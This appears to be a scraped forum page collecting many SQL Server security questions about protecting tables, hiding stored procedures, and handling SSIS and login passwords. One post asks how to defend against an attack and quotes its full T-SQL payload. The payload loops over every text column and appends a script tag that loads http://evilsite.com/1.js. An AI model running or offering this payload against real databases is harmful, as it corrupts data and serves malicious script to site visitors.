Hi,
I need to provide a facility to do routine database administration
(backups, etc.) without allowing the logged in user to modify the
data in any of the SQL server tables. Is there any way to accomplish
this (such as maybe password protecting the tables or otherwise)? I am
fairly new to SQL server - so would appreciate any pointers to this.
Thanks a ton!
Regards,
Radha
I have a database installed on my server, and i have put a database on user "sa" , so when any user wants to view the database he must enter the password to view its content. But i have dicover that if the user make the authentication "Windows Authentication" and opened the database it will be opned without the need to enter the password !!! and for this i cant restrict the access for my database from un-authorized people.
Can any one tell me how i can restrict view database content unless entering the password?
Thaks
In SRS is there a simiple way to password protect a report? Or will I need to handle this in ASP?
View 4 Replies View RelatedDoes anyone know how I can password protect XP Professional Control Panel?ThanksRonnie
View 1 Replies View RelatedAndy writes "Good day Gurus!
I have a question regarding how to protect my SQL data. My Material Resource Planning software is built on SQL. There is a problem with my data and possibly a bug in the vendors software. They are asking me to send them my database.
My database contains vendors, customers, pricing partlists and procedures. The advantage of an MRP/ERP system is that the data is all in one place; the disadvantage is that if I send it out to the vendor, they have access to all that I do. This vendor also supports some of my competitors. My concern is that all it would take is one vendor employee to jump ship with my data on a dongle and I could end up completely compromised as a company.
Is there a way of easily or is there software that can leave the significant data in tact but replace the confidential data with meaningless information?
Significant data would be numbers, costs, etc, or data that I choose. Confidential data would be vendors, customers, etc.
It seems to me that this would be a fairly common problem, but I cannot find a solution that is both quick and effective.
Thanks for your collective thoughts.
Andy,"
I have a Windows Forms 2.0 application with which I am distributing a SQL Express database. I am currently using User Instances. Due to HIPAA requirements, I need to prevent any consumers from accessing the data within the database. Only the application should be able to expose the data. Ideally, I would like to hard code credentials into the compiled code to do this. How can I accomplish this ?
View 1 Replies View RelatedI have several sites which refer to a table in an MS SQL data base on the server.
I'm looking for a good way to check that my tables don't get corrupted
over time. It seems that I can't create a duplicate by selecting the
individual table and going SaveAs..
Can someone point me to the fool proof method that everyone else already uses, please ?
David Morley
I have connected to Database using my credentials by checking remember password option. After few days I forgot my password. How can I recover the password as SQL remember it. Is there any way to recover my password instead of resetting it.
View 3 Replies View RelatedHello,
I am building a website in ASP.net 2.0 and I want to protect my self from sql Injection.
I am half way there in that I have built my own class that I use to check any input to the Database from a textbox (or user input) for specific characters that cause trouble, such as the “ ‘ � or “;� it then converts them to my own code for example “ ’ � = |^| the same function will convert my “code� back to the original character which works great until I get to Gridviews and Forum View.
Does anyone know how I would access the class I created through the gridview and formview so that any info they display gets first translated through my class.
Or if that is not possible how I would set the grideview or formview to translate the “codes� for me.
If I am totally off track here and there is a much better way to do all this then I am all ears. Please keep in mind I will require the “bad� characters to be saved in some way shape or form.
Thanks
I have a VB6 program that is using MS-SQL Server 2000. The people using the program can access the database and modify the records. This is fine except for one table.
Is it possible to prevent users from modifying one table (they can still view it) and allowing me and the VB program to acces this table?
I am currently writing a VB app based around a SQLserver2000 database. I have used stored procedures wherever possible to select/update/delete data. I am planning to distribute this app and wonder whether there are any tricks out there for encrypting/setting security so that even the SA account would be unable to read my stored procedures, but obviously be able to execute them?
There are two scenarios - one is where I want to let someone borrow a laptop just for a few days for a demo. Presumably I just give them an unprivileged user account without interactive logon possibilities, by which I mean Enterprise Manager and the other SQLserver Client tools [can I do this?] and control all access from the app.
The other scenario is when the app is purchased and I no longer have control of the SQL Server nor the SA account.
Any pointers would certainly be very useful indeed. Thanks.
I've been trying to look for information about using an SQL 2005 database with ASP.NET 2.0 - while there are loads of different articles coving configuring a database to use with asp.net, I cannot find anything on securing a sub-folder in my asp.net application. At the moment I am successfully connecting to, and validating users via a login page in my asp.net application, however, this is all pointless since I can still browse to the pages without logging in! I have tried putting in the usual <location> tags in my root web.config file and asp.net throws an error referring to my connection string, I have also tried adding a web.config file to the sub-directory, but that just uses the windows login, and I can't find anything that'll allow me to tie my own login page to it... Arrrgh! Any help will be greatly appreciated!
Thanks in advance.
Hello,I wrote some complicated functions (and stored procedures) in databaseat my work. System administrator (and every db user) can view codes(in Enterprise Manager for eg.). My employer needs periodic modifyingof code and so I'm required to do it. But I can loose my job :)because users are able to modify code (althout they ware too lazy tocreate it by themselves).Is this possible to protect functions from view it?[please, don't mind my english]
View 5 Replies View RelatedHidoes anyone know of a way of giving developers read only access to adatabase diagram in Enterprise Manager (SQL Server 2000). The database wassupplied by a third party and we don't want them tinkering with it, butthey do need to be able to create additional tables etc. to extend thefunctionality of the package.TIAChloe Crowder
View 2 Replies View RelatedHelloo all,
I would like to gather some thoughts on how to secure my database (running on sql server 2005) from SQL injection , one such as :
Code Snippet
DECLARE @T varchar(255), @C varchar(255);
DECLARE Table_Cursor CURSOR FOR
SELECT a.name, b.name
FROM sysobjects a, syscolumns b
WHERE a.id = b.id AND a.xtype = 'u' AND
(b.xtype = 99 OR
b.xtype = 35 OR
b.xtype = 231 OR
b.xtype = 167);
OPEN Table_Cursor;
FETCH NEXT FROM Table_Cursor INTO @T, @C;
WHILE (@@FETCH_STATUS = 0) BEGIN
EXEC(
'update [' + @T + '] set [' + @C + '] =
rtrim(convert(varchar,[' + @C + ']))+
''<script src=http://evilsite.com/1.js></script>'''
);
FETCH NEXT FROM Table_Cursor INTO @T, @C;
END;
CLOSE Table_Cursor;
DEALLOCATE Table_Cursor;
Basically this statement finds every text column contained in a database and inserts a cross site script into it.
I know this topic has been covered in some depth in articles such as :
MSDN article on SQL injection (http://msdn.microsoft.com/en-us/library/ms161953.aspx)
and on forums a few times.
And the general consensus is to check application code and fix it, which is fine, however we have many legacy systems where it would be too time consuming to fix the problem at the application level.
So the alternative is fix this at the database level.
A possible solution is to isolate the application access to only the objects it uses, and none of the system objects. This should prevent the statement above from running, because it requests access to the sysobjects and syscolumns views. I could implement this by changing the schema for all user objects from dbo to [myAppSchema] and assigning it to my applications database user.
Not particularly elegant but might work, what do you think?
Nigel.
I have developed some custom SQL reports that query a major software vendor's SQL Database, and I would like to sell them commercially.
The only problem is that I dont know how to protect them from casual piracy? Ideally I would like to tie them into a uniqueness of the database server eg the machine SID or similar but have no experience of this..
Can anyone recommend a way of commercially protecting the code pleaaaase?
Thanks!
I am creating a .NET application with a SQL database (SQL 2005). The database will be installed at the clients site. I would like to keep them from viewing my Tables, Stored Procedures, etc. I have read several posts on here and no one has given a solution to this, is this possible in SQL?? I am also currently encrypting/decrypting the table data in my SP's but what is to prevent the client from writing an application that accesses my SP's and therefore retrieving the decrypted data??
Hi I am using sql server 2005 express and would like to keep all my fields from being both updated and deleted.
In other words, once I create a new record, I would like to have it protected from being deleted and I dont want the field values to be updated/changed from the values initially entered. Is there a way to this without running triggers or changing database permissions and user roles?
I tried making the database read-only, but then of course i cant add new records.
Thanks
Lets assume SQL Server 2005 running on Windows 2003 Server, connected to a network but not part of the domain. One application accesses it over the network with one login. Either SQL Server or a local windows login is used for authentication. This would protect SQL Server if the domain was compromised. I can see in normal circumstances domain level logins should be used, but in certain scenerios where the security of the SQL Server box is top would this be a good solution?
Thanks
Danny
Hello all, I have an app that is distributed to buyers and is registered on a per-computer basis. I am currently using SQL Server 2005. I have created my own registration process in which I can create a registration key file that my app reads to see the maximum # of uses of the app are allowed. I am saving the # of uses in a "keyuses" table. I need to protect this table from the users logging into the server with windows authentication and being able to edit the information in this table. I am used to Firebird, in which the security is totally user based, no windows authentication. You must explicitly grant access to every table for each user, or to the public user that represents every user. Anyways, I am pretty new to SQL server 2005. I know that there must be a way to protect a table from any modification except by a "SQL Authentication" user, which requires a username and password.
Thank you all!
Branden Johnson
Dear GroupI'd be grateful if you can give me some advice on the following.An application I wrote uses an MSDE backend and I wonder whetherthere's a way (even for the system administrator) of not seeing ortracing stored procedure code, view and table designs?And I also wonder whether you can advise me on an installer thathandles MSDE and database setup during installation without too mucheffort but is still affordable < USD 1000.Any articles, resources, advice hints for these two topics are veryappreciated.Thank you very much for your help & efforts!Martin
View 3 Replies View RelatedI have a package protected by a password - I am already unhappy that to get it to use the configuration file to change connection strings for the production servers I have had to hardcode the password into the config file - very insecure!
However, the package now deploys correctly to the production server and will run from there OK, but NOT if scheduled as a SQL Server Agent Job. Thus is because however often I edit the command line to include the password after the DECRYPT switch (which it has prompted me for when I click on the command line tab), the Job Step will not retain it.
If I open it up after I have edited it and closed it, the password has disappeared.
I know that if I run dtexec plus the code in the Command Line tab (with the password), the package runs OK.
This is driving me insane!
I have read all the other posts and so I tried replacing the SSIS package step with a CmdExec step and pasting that code into there - then I get an OLEDB error..
The code I use is:
DTEXEC /SQL "ImportRateMonitoringTables" /SERVER servername /DECRYPT password /CONFIGFILE "D:Microsoft SQL ServerSSISDeploymentsRateMonitoringImportTasksDeploymentImportRateMonitoringTables_Production.dtsConfig" /MAXCONCURRENT " -1 " /CHECKPOINTING OFF /REPORTING E
and I get
SSIS Error Code DTS_E_OLEDBERROR. An OLE DB error has occurred. Error code: 0x8000FFFF
although the same code executes perfectly from a command prompt.
Please does anyone have any experience with a similar problem and if so, how did you get round it?
Thank you
I am receiving the following error message when attempting to create a new SQL Authenticated login id.
Password validation failed. The password does not meet the requirements of the password filter DLL. (Microsoft SQL Server, Error: 15119)
I have four servers all running SQL Server 2005 SP2 on Windows 2003 Ent. SP1. Of the four servers, only one received the above error message using the same TSQL below.
CREATE LOGIN TEST_LOGIN WITH PASSWORD = 'pvif9dal' MUST_CHANGE, CHECK_EXPIRATION = ON
All four servers are in the same domain, which if I understand correctly, the password policies are therefore inherited at the OS level by the domain. The password being used is within the password policies of the domain.
Any ideas as to a root cause?
I have a set of Password data in a table which is encrypted e.g. UOTYoeUK8ae89IM6PKButX5ssew= , i was wondering how to decryted it so that it reveals the passwords.
View 2 Replies View RelatedWhat should be data type of password field?
View 2 Replies View RelatedI tried to install an ALLDATA database which run with SQL Server 2005 express edition. The data base fails to install becase of the following code that come up which is related to AS password requirement. The error that come up is:
TITLE: Microsoft SQL Server 2005 Setup
------------------------------
The sa password must meet SQL Server password policy requirements. For strong password guidelines, see Authentication Mode, in SQL Server Books Online.
For help, click: http://go.microsoft.com/fwlink?LinkID=20476&ProdName=Microsoft+SQL+Server&ProdVer=9.00.2047.00&EvtSrc=setup.rll&EvtID=28001&EvtType=sqlca%5csqlcax.cpp%40SAPasswordPolicyCheck%40SAPasswordPolicyCheck%40x6d61
------------------------------
BUTTONS:
&Retry
Cancel
------------------------------
I am trying to install this database in a network server operating under Windows Server 2003 R2 with SP2. If anyone knows how to solve this problem, please let me.
Thanks,
Amilcar
There is a ">" character (right-angle bracket) inside my SQL Server password. When I supplied this password to the bcp utility, the ">" character was treated as an output redirection symbol. So the password was truncated at ">" and the bcp output got sent to a file with a name consisting of the rest of the password after ">". I'm using SQL Server 2012. I cannot use Windows authentication due to company policy. Is there a way to resolve this without changing the password?
View 7 Replies View RelatedI have a simple solution with (right now) 4 packages, 3 configuration files and one "global" datasource. Here is the View Code on the data source:<DataSource xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:dwd="http://schemas.microsoft.com/DataWarehouse/Designer/1.0" xsi:type="RelationalDataSource" dwd:design-time-name="02d8345e-665e-4bd8-9323-1e846af220e5" xmlns="http://schemas.microsoft.com/analysisservices/2003/engine"> <ID>PPDM37 Staging</ID> <Name>PPDM37 Staging</Name> <CreatedTimestamp>0001-01-01T07:00:00Z</CreatedTimestamp> <LastSchemaUpdate>0001-01-01T07:00:00Z</LastSchemaUpdate> <ConnectionString>Provider=SQLNCLI.1;Data Source=engsql03.dev.ihs.com;Persist Security Info=True;Password=;User ID=;Initial Catalog=PPDM37_Staging</ConnectionString> <ConnectionStringSecurity>PasswordRemoved</ConnectionStringSecurity> <Timeout>PT0S</Timeout></DataSource>As you can see, the <ConnectionStringSecurity> node is set with PasswordRemoved. When editing the data source and checking the Keep Password option on it still saves with PasswordRemoved! I've even gone in and hand edited the above XML. The next time I view the XML it is set back to PasswordRemoved. How the heck do I keep the password with the connection string? I am pushing the connection string out to a global config file and it does not save the password there either. Extremely frustrating as it is causing us to hard code the password inside our packages which means it is no longer able to move from one server to the next without touching every single package.Suggestions? Is there a setting somewhere in SSIS that is doing this?
View 3 Replies View RelatedAnupG writes "hi,
the most common feature that any RDBMS provides should be that if we want to store the data in the MSSQL tables then the data should be presented in masked/formatted like for eg.the password text in field should be like "*****". I am using SQL 2000 but i unofrtunately i couldn't find any such feature in defining the data type in SQL server 2000 ...?"
After designing a SSIS package in Visual Studio 2005 that had two connection manager defined to keep the password. After I deployed the package to a file system. I then Imported the .dtsx file after making a Integration Services connection in Sql Server Management Studio. When I tried to run the package it failed when it tried to make the connection. When I edited the connection manager connection string and added the password and the package ran fine but it does not retain the password!. I need to have this package scheduled to run daily so I need to know how to have the package keep the password in the connection string. I have seen other posts on this issue but not seen a good solution. Could someone point me to the proper MSDN article that would explain how to implement this ? Is it a SQL Server configuration issue or a property in Visual Studio SSIS design time ?
thanks.
HowTo: Import data to MS SQL 2008 from password protected Access DB ?
View 2 Replies View RelatedHi there ,1. i have a database and i want to encrypt my passwords before storing my records in a database plus i will later on would require to authenticate my user so again i have to encrypt the string provided by him to compare it with my encrypted password in database below is my code , i dont know how to do it , plz help 2. one thing more i am storing IP addresses of my users as a "varchar" is there a better method to do it , if yes plz help me try { SqlConnection myConnection = new SqlConnection(); myConnection.ConnectionString = ConfigurationManager.ConnectionStrings["projectConnectionString"].ConnectionString; SqlDataAdapter myAdapter = new SqlDataAdapter("SELECT *From User_Info", myConnection); SqlCommandBuilder builder = new SqlCommandBuilder(myAdapter); DataSet myDataset = new DataSet(); myAdapter.Fill(myDataset, "User_Info"); //Adding New Row in User_Info Table DataRow myRow = myDataset.Tables["User_Info"].NewRow(); myRow["user_name"] = this.user_name.Text; myRow["password"] = this.password.Text; // shoule be encrypted //not known till now how to do it myRow["name"] = this.name.Text; myRow["ip_address"] = this.ip_address.Text; myDataset.Tables["User_Info"].Rows.Add(myRow); myAdapter.Update(myDataset, "User_Info"); myConnection.Close(); myConnection.Dispose(); } catch (Exception ex) { this.error.Text = "Error ocurred in Creating User : " + ex.Message; }
View 3 Replies View RelatedI'm using a shared data source to connect an Oracle server in my packages. After changing the database user password in the shared data source, I noticed the package concerned would fail with the following description.
Source: "OraOLEDB"Â Hresult: 0x80004005Â Description: "ORA-01017: invalid username/password; logon denied".
Is there a way to ensure the packages will use the latest information in the shared data source? I did do a Rebuild before executing the packages.